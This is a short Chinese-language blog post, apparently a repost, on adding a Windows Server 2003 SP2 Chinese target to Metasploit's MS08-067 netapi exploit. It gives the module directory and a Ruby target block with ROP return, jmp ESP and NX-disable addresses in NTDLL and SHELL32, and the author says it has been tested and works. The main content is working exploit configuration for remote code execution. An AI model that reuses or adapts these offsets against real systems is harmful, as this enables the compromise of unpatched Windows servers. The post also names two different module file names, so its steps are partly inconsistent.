在ms08_067_netapi中添加2003的Chinese版本

标签：系统   mod   win   版本   nbsp   work   ram   disable   span   

///在我一次做实验的时候需要用到，但是我一直找不到Chinese的版本的，后来也找到了方法，如下

cd /usr/share/metasploit-framework/modules/exploits/windows/smb

找到ms08_067_netapi.rb文件

在ms08_067_netapi_ser2003_zh.rb中增加以下代码，其实就是修改了四个跳转指针地址（举一反三，其他系统。。。）。

[‘Windows 2003 SP2 Chinese (NX)‘,
{
‘RetDec‘ => 0x7c99beb8, # dec ESI, ret @NTDLL.DLL (0x4EC3)
‘RetPop‘ => 0x7cb5e84e, # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
‘JmpESP‘ => 0x7c99a01b, # jmp ESP @NTDLL.DLL(0xFFE4)
‘DisableNX‘ => 0x7c96f517, # NX disable @NTDLL.DLL
‘Scratch‘ => 0x00020408,
}
],

然后msfconsole启动，查看一下就好了

///就是这样子了，我也测试过了，没有问题

在ms08_067_netapi中添加2003的Chinese版本

标签：系统   mod   win   版本   nbsp   work   ram   disable   span   

原文地址：https://www.cnblogs.com/gusi/p/12089500.html